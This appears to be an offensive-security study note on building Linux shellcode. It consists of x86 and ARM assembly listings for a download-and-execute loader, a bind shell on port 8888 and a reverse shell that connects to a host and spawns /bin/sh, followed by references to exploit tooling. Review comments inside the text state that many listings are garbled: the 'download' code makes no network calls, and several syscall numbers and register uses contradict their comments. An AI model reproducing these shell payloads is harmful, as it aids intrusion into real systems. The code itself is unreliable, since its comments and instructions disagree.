Why it matters in practice
Shell-Codes/Payloads Build Your Own (Linux Shellcoding) matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps Shell-Codes/Payloads Build Your Own (Linux Shellcoding) tied to the offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through Shell-Codes/Payloads Build Your Own (Linux Shellcoding).
- Shellcoding theory
- Generating shellcode with Metasploit
- Building shellcode with assembly
- Shellcode assembler
- Compiler script
- Hex converter
- Building shellcode in C
- C shellcode
- Syscall table
- Exit shellcode in assembly
Selected public references
;-----------------------------------------------------------------------
; Reviewed listing (reformatted from one collapsed line; instructions unchanged).
; Target: x86-64 Linux, NASM/Intel syntax, raw syscall interface.
; NOTE(review): despite the "download" comments, no network syscall appears
; in this listing — the numbers loaded into rax are 2 (open), 0 (read),
; 9 (mmap) and 60 (exit). Several comments and operands disagree (noted
; inline); treat the listing as illustrative rather than a verified build.
;-----------------------------------------------------------------------
section .text
global _start
_start:
; URL of the file to download
        mov rdi, url                    ; absolute (non RIP-relative) address load
; Path where the file should be stored
        mov rsi, target_path            ; passed as the 2nd syscall argument
; download the file
        xor rdx, rdx                    ; null-terminated string (original comment); rdx = 0
        mov rax, 2                      ; system call number for open
        syscall
; Create or open file
        mov rdi, rax                    ; file descriptor
        mov rdx, 4096                   ; buffer size
        mov rsi, buffer
        xor rax, rax                    ; read file
        syscall
; prepare a memory region for shellcode
        mov rdi, rsp                    ; pointer to the stack
        sub rdi, 4096                   ; move down by 4096 bytes
        mov rsi, buffer                 ; 2nd mmap argument is the buffer address here
        mov rdx, rax                    ; length of the shellcode that was read
        mov rax, 9                      ; system call number for mmap
        xor r10, r10                    ; Flags (MAP_PRIVATE | MAP_ANONYMOUS) per original comment; r10 = 0
        xor r8, r8                      ; file descriptor (ignored)
        xor r9, r9                      ; offset in file (ignored)
        syscall
; copy the shellcode into memory
        mov rdi, rax                    ; destination address
        mov rsi, buffer
        mov rdx, rax                    ; length of the shellcode (original comment; rax is the mmap return value here)
        xor rax, rax                    ; read file
        syscall
; execute shellcode
        mov rdi, rax                    ; shellcode address (original comment; rax is the read return value here)
        xor rax, rax                    ; exit code 0 (original comment); rax = 0
        call rdi                        ; control transfers to the address in rdi
; exit the program
        xor edi, edi                    ; exit code 0
        mov rax, 60                     ; system call number for exit
        syscall
section .data
url db "ftp://example.com/your_file.txt", 0
target_path db "/path/to/your_file.txt", 0
buffer times 4096 db 0
;-----------------------------------------------------------------------
; Reviewed listing (reformatted from one collapsed line; instructions unchanged).
; Target: x86-64 Linux, NASM/Intel syntax, raw syscall interface.
; NOTE(review): despite the "download" comments, no network syscall appears —
; the numbers loaded into rax are 2 (open), 0 (read), 1 (write) and 60 (exit).
; Treat the listing as illustrative rather than a verified build.
;-----------------------------------------------------------------------
section .text
global _start
_start:
; URL of the file to download
        mov rdi, url                    ; absolute (non RIP-relative) address load
; Path where the file should be stored
        mov rsi, target_path            ; passed as the 2nd syscall argument
; download the file
        xor rdx, rdx                    ; null-terminated string (original comment); rdx = 0
        mov rax, 2                      ; system call number for open
        syscall
; Create or open file
        mov rdi, rax                    ; file descriptor
        mov rdx, 4096                   ; buffer size
        mov rsi, buffer
        xor rax, rax                    ; read file
        syscall
; save file
        xor rdi, rdi                    ; file descriptor 0 (original comment says standard output; fd 0 is standard input)
        mov rdx, rax                    ; number of bytes read
        mov rsi, buffer
        mov rax, 1                      ; system call number for write
        syscall
; exit the program
        xor edi, edi                    ; exit code 0
        mov rax, 60                     ; system call number for exit
        syscall
section .data
url db "https://example.com/your_file.txt", 0
target_path db "/path/to/your_file.txt", 0
buffer times 4096 db 0
// Reviewed listing. Target: 32-bit ARM Linux, GNU as syntax ("//" comments).
// Register roles as the comments intend: r7 = syscall number, r0-r3 = arguments,
// r8 = scratch copy.
// NOTE(review): the values placed in r7 and the argument layout in r0-r3 do not
// consistently match the ARM EABI/socketcall convention the comments describe,
// and the "mov rN, rN" lines are no-ops; treat this listing as illustrative
// rather than a verified build and check each value against the target's
// syscall table.
.section .text
.global _start
_start:
// create a socket
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, #1              // AF_INET = 2 (original comment; the immediate here is 1)
        mov r1, #1              // SOCK_STREAM = 1
        eor r2, r2, r2          // protocol = 0
        mov r8, r2              // copy of r2 for later use
        mov r2, #41             // socketcall sub-function: socket = 41 (original comment)
        swi #0                  // execute syscall
// bind the socket
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, r0              // socket file descriptor
        ldr r1, =0x02000000     // IP address = 0.0.0.0 (INADDR_ANY) (original comment)
        ldrh r2, =0x8818        // port number = 8888 (0x22B8) (original comment)
        mov r3, #16             // address length = 16
        mov r8, r3              // copy of r3 for later use
        mov r3, #2              // socketcall sub-function: bind = 2
        swi #0                  // execute syscall
// put the socket into listening mode
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, r0              // socket file descriptor
        mov r1, r8              // address length
        mov r8, r1              // copy of r1 for later use
        mov r1, #4              // socketcall sub-function: listen = 4
        swi #0                  // execute syscall
// accept the incoming connection
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, r0              // socket file descriptor
        ldr r1, =0x00ffff02     // pointer to a 4-byte buffer for the client IP (original comment)
        ldr r2, =0x22           // pointer to a 4-byte buffer for the client port number (original comment)
        mov r3, r8              // copy of address length for later use
        mov r8, r3              // copy of r3 for later use
        mov r3, #5              // socketcall sub-function: accept = 5
        swi #0                  // execute syscall
// duplicate file descriptors for communication
        mov r7, #63             // dup2 syscall number
        mov r0, r0              // original file descriptor (socket)
        mov r1, #0              // target file descriptor (standard input)
        swi #0                  // execute syscall
        mov r0, r0              // original file descriptor (socket)
        mov r1, #1              // target file descriptor (standard output)
        swi #0                  // execute syscall
        mov r0, r0              // original file descriptor (socket)
        mov r1, #2              // target file descriptor (standard error)
        swi #0                  // execute syscall
// execute a shell
        ldr r7, =0x6e69622f     // load "/bin/sh" as ASCII (original comment; the literal is the 4 bytes "/bin")
        strb r7, [r0, #7]       // insert null terminator (original comment; strb stores the low byte of r7)
        mov r7, #11             // execve syscall number
        mov r0, r0              // filename ("/bin/sh")
        eor r1, r1, r1          // argv = NULL
        eor r2, r2, r2          // envp = NULL
        swi #0                  // execute syscall
// exit the program
        mov r7, #1              // exit syscall number
        eor r0, r0, r0          // exit code = 0
        swi #0                  // execute syscall
.section .text
// Reviewed listing. Target: 32-bit ARM Linux, GNU as syntax ("//" comments).
// Register roles as the comments intend: r7 = syscall number, r0-r3 = arguments,
// r4 = saved socket descriptor, r8 = scratch copy.
// NOTE(review): as in the listing above, the r7 values and the r0-r3 argument
// layout do not consistently match the ARM EABI/socketcall convention the
// comments describe; treat it as illustrative rather than a verified build.
.global _start
_start:
// create a socket
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, #2              // AF_INET = 2
        mov r1, #1              // SOCK_STREAM = 1
        eor r2, r2, r2          // protocol = 0
        mov r8, r2              // copy of r2 for later use
        mov r2, #41             // socketcall sub-function: socket = 41 (original comment)
        swi #0                  // execute syscall
        mov r4, r0              // save the socket file descriptor
// connect to remote host
        mov r7, #2              // socketcall syscall number (original comment)
        mov r0, r4              // socket file descriptor
        ldr r1, =0x0101017f     // IP address = 127.1.1.1 (adjust as required)
        ldrh r2, =0xbb80        // port number = 48000 (adjust as required)
        mov r3, #16             // address length = 16
        mov r8, r3              // copy of r3 for later use
        mov r3, #3              // socketcall sub-function: connect = 3
        swi #0                  // execute syscall
// duplicate file descriptors for communication
        mov r7, #63             // dup2 syscall number
        mov r0, r4              // original file descriptor (socket)
        mov r1, #0              // target file descriptor (standard input)
        swi #0                  // execute syscall
        mov r0, r4              // original file descriptor (socket)
        mov r1, #1              // target file descriptor (standard output)
        swi #0                  // execute syscall
        mov r0, r4              // original file descriptor (socket)
        mov r1, #2              // target file descriptor (standard error)
        swi #0                  // execute syscall
// execute a shell
        ldr r7, =0x6e69622f     // load "/bin/sh" as ASCII (original comment; the literal is the 4 bytes "/bin")
        strb r7, [r0, #7]       // insert null terminator (original comment; strb stores the low byte of r7)
        mov r7, #11             // execve syscall number
        mov r0, r0              // filename ("/bin/sh")
        eor r1, r1, r1          // argv = NULL
        eor r2, r2, r2          // envp = NULL
        swi #0                  // execute syscall
// exit the program
        mov r7, #1              // exit syscall number
        eor r0, r0, r0          // exit code = 0
        swi #0                  // execute syscall

@ ---------------------------------------------------------------------
@ Reviewed listing (reformatted from one collapsed line; instructions unchanged).
@ Target: 32-bit ARM Linux, GNU as syntax ("@" comments).
@ NOTE(review): despite the "download" comments, no socket or network syscall
@ appears; the numbers placed in r7 are 5 (open), 0, 0, 0 and 1 (exit), and
@ the value 192 from the mmap comment is loaded into r0, not r7. Treat the
@ listing as illustrative rather than a verified build.
@ ---------------------------------------------------------------------
.section .text
.global _start
_start:
@ URL of the file to download
        ldr r0, =url
@ Path where the file should be stored
        ldr r1, =target_path
@ download the file
        mov r2, #0              @ null-terminated string (original comment); r2 = 0
        mov r7, #5              @ system call number for open
        svc 0
@ Create or open file
        mov r1, r0              @ file descriptor
        mov r2, #4096           @ buffer size
        ldr r0, =buffer
        mov r7, #0              @ read file (original comment)
        svc 0
@ prepare a memory region for shellcode
        mov r1, sp              @ pointer to the stack
        sub r1, #4096           @ move down by 4096 bytes
        ldr r2, =buffer
        mov r3, r0              @ length of the shellcode that was read (original comment)
        mov r0, #192            @ system call number for mmap (original comment; loaded into r0)
        mov r7, #0              @ Flags (MAP_PRIVATE | MAP_ANONYMOUS) (original comment; r7 = 0)
        mov r8, #0              @ file descriptor (ignored)
        mov r9, #0              @ offset in file (ignored)
        svc 0
@ copy the shellcode into memory
        mov r1, r0              @ destination address
        ldr r2, =buffer
        mov r3, r0              @ length of the shellcode (original comment)
        mov r0, #0              @ read file (original comment)
        svc 0
@ execute shellcode
        mov r0, r1              @ shellcode address (original comment)
        mov r7, #0              @ exit code 0 (original comment)
        blx r0                  @ branch to the address in r0 (original comment: "exit the program")
@ exit the program
        mov r0, #0              @ exit code 0
        mov r7, #1              @ system call number for exit
        svc 0
.section .data
url: .asciz "ftp://example.com/your_file.txt"
target_path: .asciz "/path/to/your_file.txt"
buffer: .space 4096, 0
@ Reviewed listing. Target: 32-bit ARM Linux, GNU as syntax ("@" comments).
@ NOTE(review): despite the "download" comments, no network syscall appears;
@ r7 takes 5 (open), 0, 1 (write per the comment) and 1 (exit). Treat the
@ listing as illustrative rather than a verified build.
.section .text
.global _start
_start:
@ URL of the file to download
        ldr r0, =url
@ Path where the file should be stored
        ldr r1, =target_path
@ download the file
        mov r2, #0              @ null-terminated string (original comment); r2 = 0
        mov r7, #5              @ system call number for open
        swi 0
@ Create or open file
        mov r1, r0              @ file descriptor
        mov r2, #4096           @ buffer size
        ldr r0, =buffer
        mov r7, #0              @ read file (original comment)
        swi 0
@ save file
        mov r0, #1              @ file descriptor 1 (standard output)
        mov r2, r1              @ number of bytes read (original comment; r1 still holds the fd copied above)
        ldr r1, =buffer
        mov r7, #1              @ system call number for write (original comment)
        swi 0
@ exit the program
        mov r0, #0              @ exit code 0
        mov r7, #1              @ system call number for exit
        swi 0
.section .data
url: .asciz "https://example.com/your_file.txt"
target_path: .asciz "/path/to/your_file.txt"
buffer: .space 4096, 0
section .text
; Reviewed listing. Target: 32-bit x86 Linux, NASM/Intel syntax, int 0x80 interface.
; Syscall numbers loaded into eax: 5 (open), 3 (read), 4 (write), 1 (exit).
; NOTE(review): the i386 convention places arguments in ebx, ecx, edx in order;
; the read and write sections here stage some values in other registers (see
; inline notes), so treat the listing as illustrative rather than a verified build.
global _start
_start:
; open file
        mov eax, 5              ; system call number for open
        mov ebx, path_to_file   ; absolute address of the path string
        xor ecx, ecx            ; Flags (O_RDONLY)
        xor edx, edx            ; mode (ignored)
        int 0x80
; save the file descriptor in EBX
        mov ebx, eax
; read the contents of the file into the buffer
        mov eax, 3              ; system call number for read
        mov ecx, ebx            ; file descriptor (original comment; ecx = fd copied from ebx)
        mov edx, buffer
        mov esi, 4096           ; maximum length of content to read (original comment; placed in esi)
        int 0x80
; write the contents to standard output
        mov eax, 4              ; system call number for write
        xor ebx, ebx            ; file descriptor 1 (standard output) (original comment; ebx = 0)
        mov ecx, buffer
        mov edx, eax            ; number of bytes read (original comment; eax was just set to 4)
        int 0x80
; exit the program
        xor ebx, ebx            ; exit code 0
        mov eax, 1              ; system call number for exit
        int 0x80
section .data
path_to_file db "/path/to/file.txt", 0
buffer times 4096 db 0
Selected public references
- pwntools Documentation — docs.pwntools.com/en/stable/
- gef-legacy.readthedocs.io · Latest — gef-legacy.readthedocs.io/en/latest/
- pwndbg — pwndbg.re/
- Shell-Storm — shell-storm.org/
- Exploit Database — exploit-db.com/
